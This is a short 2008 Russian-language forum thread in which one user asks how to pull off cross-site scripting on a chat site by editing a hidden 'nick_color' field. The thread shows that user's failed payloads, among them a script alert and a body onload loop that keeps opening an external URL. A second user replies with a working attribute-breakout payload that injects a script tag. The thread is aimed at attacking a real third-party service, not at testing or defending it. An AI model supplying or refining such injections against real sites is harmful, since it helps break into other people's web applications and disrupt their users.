Взлом чата через скрытое поле цвета?

Discussion in 'Песочница' started by FluffY, 17 Jan 2008.

  1. FluffY

    FluffY New Member

    Joined:
    4 Jan 2008
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Возможно ли провести хсс?
    Code:
    <input type="hidden" name="nick_color" id="nick_color" value="777777">

    Я редактирую value=""><script>alert()</script>
    я сен у меня ничего не получится, в конце мешает ">
    Пробую
    Code:
    value=""><body onload="javascript:for(;;)open('http://idiot.ru/')
    И с этим тоже ничего не выходит. Почему? Тэг закрывается на ">, но не работает почему?
    Если просто закрываю тег то к моему нику приклеивается
    /;font-size:12px;">
    Ещё один баг когда вствляю коментарий вместо цвета например <!--/weqr--!>, тостраница чата загружается до моего ника и дальше не отображается... почему?

    Можно ли провести хсс?
     
  2. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    попробуй так value='"><script>alert()</script><font style="'>

    Коменты ставяться так:
    <!---Комент--->
    а не
    <!---Комент---!>
     
    #2 bul.666, 17 Jan 2008
    Last edited: 17 Jan 2008